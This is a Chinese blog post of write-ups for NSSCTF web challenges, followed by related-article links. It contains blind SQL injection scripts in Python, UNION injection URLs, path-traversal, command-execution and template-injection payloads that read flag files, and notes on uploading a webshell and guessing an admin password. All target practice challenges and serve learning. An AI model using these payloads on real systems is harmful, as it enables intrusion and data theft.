NSSCTF做题(6)

最新推荐文章于 2024-09-07 20:59:27 发布
最新推荐文章于 2024-09-07 20:59:27 发布
阅读量541 收藏
点赞数
分类专栏: NSSCTF 文章标签: android java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/133440637
版权

[HCTF 2018]Warmup

查看源代码得到

开始代码审计

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;//page变量不存在或page变量不是字符串时返回false
            }

            if (in_array($page, $whitelist)) {
                return true;//满足page变量在whitelist数组内返回true
            }

            $_page = mb_substr(//截取page变量第一个?前的字符串
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }//白名单检查

            $_page = urldecode($page);//url解码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );//二次截断
            if (in_array($_page, $whitelist)) {
                return true;
            }//白名单检查
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

##只有三个条件全部为true时才可触发
1. ! empty($_REQUEST['file'])
##条件1表示参数不为空时返回true
2. is_string($_REQUEST['file'])
##条件2表示参数为字符串时返回true
3. emmm::checkFile($_REQUEST['file'])
##条件3表示参数满足checkFile函数时返回true

php mb_strpos()函数详解 - 飞鸟慕鱼博客

满足经过两次?截断后仍能通过白名单检查,并且include正确路径,才输出flag。 

先看看hint.php

找到了flag的目录

构建payload: /source.php?file=hint.php?../../../../../../../../ffffllllaaaagggg

这段payload,checkfile检测传入的file的值,将file赋给page变量,首先白名单检测hint.php在白名单内返回真。

然后?截断在第一次截断的时候将file中的hint.php?../../../../../../../../ffffllllaaaagggg截断为hint.php并顺利通过第二次白名单检测。

接着是一次url解码,将page变量进行一次url解码。

注意  mb_strpos($_page . '?', '?')

这段代码,“$_page . '?',”,中的那个.是一个连接符,相当于在__page变量后加上一个?。于是这次同样截断剩下hint.php再次顺利通过白名单检测。最后满足3个if条件执行include语句。在包含的时候会把hint.php?/当成一层目录,然后构造../../向上遍历找到flag。

因为白名单有两个字符串所以把file里面的hint换成source也是一样能拿到flag。

即source.php?file=source.php?../../../../../../../../ffffllllaaaagggg可以达到相同的效果。

得到flag

[CISCN 2019华北Day2]Web1 

尝试注入发现了bool错误,应该属于是布尔盲注了

布尔盲注脚本:

import requests
import time

url = "http://node2.anna.nssctf.cn:28326/index.php"
payload = {
    "id" : ""
}
result = ""
for i in range(1,100):
    l = 33
    r =130
    mid = (l+r)>>1
    while(l<r):
       # 跑库名
       #"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})".format(i, mid)

       # 跑表名
       #"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{0},1))>{1})".format(i, mid)

       # 跑列名
       #"0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{0},1))>{1})".format(i,mid)

       #######################
       #"0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)

       payload["id"] ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)

       html = requests.post(url,data=payload)
       print(payload)
       if "Hello" in html.text:
          l = mid+1
       else:
          r = mid
       mid = (l+r)>>1
    if(chr(mid)==" "):
       break
    result = result + chr(mid)
    print(result)
print("flag: " ,result)

还有

import requests
import string

def blind_sql(url):
    flag=''
    for num in range(1,60):     #flag一般不超过50个字符
        for i in string.printable:  #string.printable将给出所有的标点符号,数字,ascii_letters和空格
            payload='(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i)) #ord函数用来获取单个字符的ascii码
            post = {"id":payload}
            result = requests.post(url=url,data=post)   #提交post请求
            if 'Hello' in result.text:
                flag += i   #用flag接收盲注得到的结果
                print(flag) #打印结果
            else:
                continue
    print(flag)

if __name__ == '__main__':
    url='http://node4.anna.nssctf.cn:28304/index.php'
    blind_sql(url)

得到flag

[羊城杯 2020]easycon 

点进去有点懵,看看访问一下首页

看到了提示,应该是一句话木马,用蚁剑连接

 连接成功

 看到有一个bbbbbbbbb.txt

下载下来看像是base64转图片,得到flag

[LitCTF 2023]这是什么?SQL !注一下 ! 

先找找他的闭合条件 

(((((('.$_GET["id"].'))))))

sql注入闭合方式-CSDN博客  推荐大家看这篇博客

应该是1')))))这样闭合

爆库名

?id=1)))))) union select 1, group_concat(schema_name)from information_schema.schemata --+ 

爆表名

?id=1)))))) union select 1, group_concat(table_name)from information_schema.tables where table_schema='ctftraining' --+ 

 

爆列名
 

?id=1)))))) union select 1, group_concat(column_name)from information_scheam.columns where table_name='flag' --+ 
 

 

 查字段,得到flag
 

?id=-1)))))) union select 1,flag from ctftraining.flag%23 
 

 

[UUCTF 2022 新生赛]ez_rce 
 

代码审计
 

 

第一次见这种题,无参数rce,找了两篇博客给大家参考
 

 https://www.cnblogs.com/pursue-security/p/15406272.html
 

无参数RCE-CSDN博客
 

eval() 函数把字符串按照 PHP 代码来计算
 

即,我们通过GET传入参数code,code可以是一些命令参数,但被过滤了许多。
 

现在的目标是绕过过滤,进入if从句
 

  • 没有过滤 “ \ ” ,因此构造:
 

 /?code=printf(`l\s /`);
 

 看到flag文件,直接查看
 

 /?code=printf(`c\at /fffffffffflagafag`);
 

 

 [HNCTF 2022 Week1]easy_html 
 

 

直接抓包,找到了一个页面 访问
 

 

 发现登录框有长度限制,长度改大就出来了flag
 

[GDOUCTF 2023]受不了一点 
 

 又是这个页面,访问index.php
 

 找到源码开始审计
 

 
 
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
     $b=$_POST['ctf'];
     $a=$_POST['gdou'];
     if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){//给上边这几个参数赋值,关于md5强比较直接使用数组类型绕过即ctf[]=1&gdou[]=2
        if(isset($_COOKIE['cookie'])){
            if ($_COOKIE['cookie']=='j0k3r'){//传入cookie使cookie的值等于j0k3r cookie=j0k3r
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                   $aaa=$_GET['aaa'];
                   $bbb=$_GET['bbb'];//让get方式传入参数aaa和bbb的值传就行了
               if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){这里进行绕过,在任意一个114514后加一个字母传参aaa=114514&bbb=114514a
                   $give = 'cancanwordflag';
                    $get ='hacker!';
                    if(isset($_GET['flag']) && isset($_POST['flag'])){
                          die($give);
                     }
                    if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                        die($get);//这里选择任意一个传入flag的方式使用get,则flag的值在不断的遍历,对flag的值进行传递,输出flag构造:123=flag&flag=123
                    }
                     foreach ($_POST as $key => $value) {
                         $$key = $value;
                    }
                     foreach ($_GET as $key => $value) {
                          $$key = $$value;  
 

 

最后构造的payload:
 

get:?aaa=114514&bbb=114514a&123=flag&flag=123
 

post: ctf[]=1&gdou[]=2
 

cookie: cookie=j0k3r
 

得到flag
 

 

[SWPUCTF 2022 新生赛]ez_ez_php(revenge)
 

代码审计,又遇到了substr()函数,php伪协议就ok
 

 
 

得到base64编码
 

 还需要继续绕过
 

 
 

继续用这个协议,加上flag前面的目录就可以了
 

 

 
 

[NSSRound#1 Basic]basic_check
 

进去没东西,直接开扫
 

 

扫到了,进去看看
 

 
 

发现没东西。还是bp抓一下,还是没抓到东西
 

 

看大佬的wp才知道这个是put请求,还涉及到了一个没用过的软件 
 

Nikto安装和使用_nikto下载-CSDN博客Nikto 网页服务器扫描器_nikto扫描-CSDN博客
 

Nikto 网页服务器扫描器_nikto扫描-CSDN博客 
 

输入命令:nikto -h http://node4.anna.nssctf.cn:28806/
 

可以put请求文件上传
 

 
 

发现成功写入
 

 

命令执行得到flag
 

 

[HDCTF 2023]SearchMaster 
 

说是smarty模板,能想到的就是ssti注入
 

 看到了提示说,你可以post传参给我一个data
 

 

确定了是ssti注入,用{if}{/if}尝试注入  data={if system('ls /')}{/if}
 

得到了flag文件 
 

 

继续得到flag
 

data={if system('cat /flag_13_searchmaster')}{/if} 
 

 

[鹤城杯 2021]Middle magic 
 

 又是代码审计
 

 
 
<?php
 highlight_file(__FILE__);
 include "./flag.php";
 include "./result.php";
 if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

     $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

     if(preg_match('/pass_the_level_1#/', $aaa)){
         echo "here is level 2";
         
         if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
             if ($_POST['admin'] == $_POST['root_pwd'])
                 echo '<p>The level 2 can not pass!</p>';
         // START FORM PROCESSING    
             else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                 echo "here is level 3,do you kown how to overcome it?";
                 if (isset($_POST['level_3'])) {
                     $level_3 = json_decode($_POST['level_3']);
                     
                     if ($level_3->result == $result) {
                         
                         echo "success:".$flag;
                     }
                     else {
                         echo "you never beat me!";
                     }
                 }
                 else{
                     echo "out";
                 }
             }
             else{
                 
                 die("no");
             }
         // perform validations on the form data
         }
         else{
             echo '<p>out!</p>';
         }

     }
     
     else{
         echo 'nonono!';
     }

     echo '<hr>';
 }

 ?>  
 

 

 关键代码
 

 
 
 if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){
  $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', 
 
 
$_GET['aaa']);
 if(preg_match('/pass_the_level_1#/', $aaa)){//要求get传参aaa,让aaa=pass_the_level_1,但是level1会被替换成filtered
  echo "here is level 2";       if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
 if ($_POST['admin'] == $_POST['root_pwd'])//post传参admin和root_pwd
    echo '<p>The level 2 can not pass!</p>';
   // START FORM PROCESSING    
 else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){//让这两个参数的sha1值相等
 
 
  echo "here is level 3,do you kown how to overcome it?";
   if (isset($_POST['level_3'])) {
   $level_3 = json_decode($_POST['level_3']);
 
 
if($level_3->result == $result) {//post传参level3,对其进行json_decode后,需要$level_3->result == $result               
 
 
 echo "success:".$flag; 
 

 

深入了解PHP的json_decode()函数-PHP问题-PHP中文网 这篇详细介绍了json_decode
 

构造payload:
 

1.get传参aaa 
 

因为preg_replace函数只能匹配一行的数据,因此我们只需先传入换行符,那么后面的传入便不再被匹配
 

/?aaa=%0Apass_the_level_1%23(%0a和%23分别是换行符和井号键的url编码)
 

正则匹配单行模式(?s)下 ,.号将匹配所有字符,包括换行符;但默认情况下点号不匹配换行符,因此给了绕过(.*)的可能 
 

 2.post传参admin和root_pwd
 

我们利用数组绕过,具体原因是sha1加密时,若传入的是数组,返回值为null 
 

admin[]=1&root_pwd[]=2 
 

 3.//post传参level3,对其进行json_decode后,需要$level_3->result == $result
 

我们传入一个JSON格式的字符串,即 
 

level_3={"result":0}
 

 得到flag
 

 

 [HNCTF 2022 Week1]easy_upload
 

上传一句话木马,发现成功
 

 
 

连接蚁剑
 

 

得到flag
 

 

 
 

[SWPUCTF 2022 新生赛]奇妙的MD5 
 

 结合题目和页面提示想到了ffifdyop
 

 
 

 输入之后到了另外一个页面
 

查看源码,找到了需要审计的部分
 

 

没的说,数组绕过就结束了, ?x[]=1&y[]=2
 

到了下一个页面,md5强比较,因为他没有字符串的限制,所以还用数组就可以了
 

 

wqh[]=1&dsy[]=2 ,得到flag
 

 [GKCTF 2021]easycms
 

点什么都没反应,直接开扫
 

 扫到了一个登录页面
 

 

 访问发现
 

 

 弱口令尝试登录(或者bp爆破)
 

试出来是admin/12345
 

进到后台发现 设计->主题 处可以编辑页面,支持php源代码,于是考虑插入php在网站页面爆出flag,随便找个地方,比如 头部 处写一个php试试
 

 保存时出现如下提示: 
 

 

所以需要构造出这样一个文件,在 设计->组件->素材库 发现上传文件入口,先随便上传一个本地txt,根据先前编辑页面的路径,将上传到素材库的文件重命名为 ../../../../../system/tmp/udst 形成目录穿越。 
 

 

有了这个东西之后就可以尝试命令执行了
 

 得到flag
 

 第一次做这种题,cms都不知道是什么,记录两个
 

什么是CMS ,CMS 有哪些功能呢?|齿轮干货 - 知乎
 

CMS是什么意思-php教程-PHP中文网 
 

[HNCTF 2022 Week1]What is Web
 

有一个bp的下载链接,应该是和bp抓包有关的
 

 页面显示,抓包看看
 

 

 没抓到什么,既然是给新手看的,那就在源码里找一下
 

最后还是找到了东西
 

 

解密得到flag
 

 

 
 

 
 

 
 

 

 
 

 
 

 
 

 
 

 


                

        

        

    

  


    

      

        

            

              
                
                  呕...
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
GDOUCTF比赛WEB&CRYPTO方向全解!!

				
			

			

				

					jayq1的博客
				

				

					05-09
					
					2420
					
				

			

		

		

			
				
本次wp的制作过程耗时比较长,也有一些代码源于大佬师傅们的exp,进行了一定的详细解释,有助于刚开始学习的师傅们可以看的懂,整体是比较细节的,会一步一步带大家去解题,一步步说明为什么要这样解题,题目考查了哪些知识点,希望对大家有所帮助!如有不当之处敬请批评指正!

			
		

	



                

              
                



	

		

			

				
					
记三道大学生CTF竞赛web题

				
			

			

				

					shao65308的专栏
				

				

					11-09
					
					305
					
				

			

		

		

			
				
为什么要这样改,原因分析:在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、.、[则会被转化为_,但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换。POST传参读取文件:c=SplFileObject&n=/flag,或者:c=SplFileObject&n=php://filter/read=convert.base64-encode/resource=/flag。最后的python代码,里面有解释。主要考察原生类反序列化应用。

			
		

	



                


  
              

                


	

		

			

				
					
NSSCTF-Web题目22(弱比较、数组绕过)

				
			

			

				

					weixin_54055099的博客
				

				

					07-03
					
					948
					
				

			

		

		

			
				
弱比较,数组绕过

			
		

	





	

		

			

				
					
鹤壁杯-web签到题

				
			

			

				

					qq_51584770的博客
				

				

					10-08
					
					1240
					
				

			

		

		

			
				
题目源码:
 <?php
    highlight_file(__FILE__);
    include "./flag.php";
    include "./result.php";
    if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

        $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_

			
		

	



		

			
		



	

		

			

				
					
NSS [鹤城杯 2021]Middle magic

				
			

			

				

					Jay17的博客
				

				

					11-20
					
					358
					
				

			

		

		

			
				
NSS [鹤城杯 2021]Middle magic

			
		

	





	

		

			

				
					
[鹤城杯 2021]Middle magic

				
			

			

				

					wangzhemvp的博客
				

				

					04-17
					
					395
					
				

			

		

		

			
				
这里要猜测 $result 是一个字符串,这样 0=="abc",为true。如果代码替换了abc,但后面又要求有abc,可以用。哈希函数无法处理数组,会返回结果 null。: 解码 JSON 字符串。只能匹配一行的数据。

			
		

	





	

		

			

				
					
NSSCTF-HDCTF2023-Yami题解记录

				
			

			

				

					LeBR0NY的博客
				

				

					04-26
					
					371
					
				

			

		

		

			
				
NSS-HDCTF2023 web yami题解记录

			
		

	





	

		

			

				
					
NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE篇)

				
			

			

				

					jameshuangchuan的博客
				

				

					08-10
					
					2654
					
				

			

		

		

			
				
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(

			
		

	





	

		

			

				
					
NSSCTF-SWPU新生赛

				
			

			

				

					weixin_52033041的博客
				

				

					10-12
					
					2976
					
				

			

		

		

			
				
SWPU新生赛
Web
gift_F12
右键查看源代码

caidao
页面就有木马密码,蚁剑连接即可

flag在/目录

jicao
源码:
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

			
		

	





	

		

			

				
					
CheatEngine-实验吧CTF题库writeup

				
			

			

				

					0_Re5et
				

				

					08-31
					
					6275
					
				

			

		

		

			
				
CheatEngine--实验吧CTF题库writeup
利用CE程序通关游戏。类似CE自带的小游戏。

			
		

	





	

		

			

				
					
[SWPUCTF 2021 新生赛]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程

					
最新发布

				
			

			

				

					符啸九天的博客
				

				

					09-07
					
					353
					
				

			

		

		

			
				
[SWPUCTF 2021 新生赛]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。
[SWPUCTF 2021 新生赛]gift_F12、[SWPUCTF 2021 新生赛]jicao、[SWPUCTF 2021 新生赛]easy_md5、[SWPUCTF 2021 新生赛]include、[SWPUCTF 2021 新生赛]easy_sql

			
		

	





	

		

			

				
					
ctfshow(菜狗杯)

				
			

			

				

					qq_62046696的博客
				

				

					11-28
					
					5793
					
				

			

		

		

			
				
这样的话cookie传入 =a ,然后破石头  a=b  ,get  b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。

			
		

	





	

		

			

				
					
[GDOUCTF 2023] ——web方向全Write up

				
			

			

				

					Leaf_initial的博客
				

				

					04-17
					
					2350
					
				

			

		

		

			
				
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。

			
		

	





	

		

			

				
					
[鹤城杯 2021]Middle magic 解题思路&过程

				
			

			

				

					iamblackcat's blog
				

				

					08-13
					
					1162
					
				

			

		

		

			
				
[鹤城杯 2021]Middle magic 解题思路&过程

			
		

	





	

		

			

				
					
【无标题】

				
			

			

				

					2301_79880442的博客
				

				

					04-23
					
					1106
					
				

			

		

		

			
				
包含三个if条件:1.get传参aaa,2.post传参admin和root_pwd,二者传入的值不能够相同,但是sha1值要相等,相等就成功进入level 3.3.post传参level_3,对其进行后,如果就会输出flag。第一个的绕过:preg_replace 函数执行一个正则表达式的搜索和替换。它会把传入的level替换为filtered.但是该函数只会搜索第一行的字符串,所以就可以用换行符替换。其中%0a是换行符,%23是#

			
		

	





	

		

			

				
					
4位可控字符下的任意命令执行

				
			

			

				

					大方子
				

				

					11-02
					
					2919
					
				

			

		

		

			
				
*因为环境有点问题无法复现,无法整体复现

*但是这个trick非常有意思,想分享下





题目源码:






<?php
    error_reporting(E_ALL);
    $sandbox = '/var/www/html/sandbox/'.md5("orange".$_SERVER['REMOTE_ADDR']);
    mkdir($sandbox);
...

			
		

	





	

		

			

				
					
2021年鹤城杯

				
			

			

				

					unexpectedthing的博客
				

				

					04-17
					
					2519
					
				

			

		

		

			
				
[鹤城杯 2021]EasyP
考点
php特性
wp
代码
<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'W

			
		

	





	

		

			

				
					
正则表达式

				
			

			

				

					qq_51179608的博客
				

				

					09-02
					
					902
					
				

			

		

		

			
				
正则表达式基础知识

			
		

	





	

		

			

				
					
nssctf的jwt问3

				
			

			

				

					08-17
				

			

		

		

			
				
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。  您可以根据需要修改保存图片的路径和文件名。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值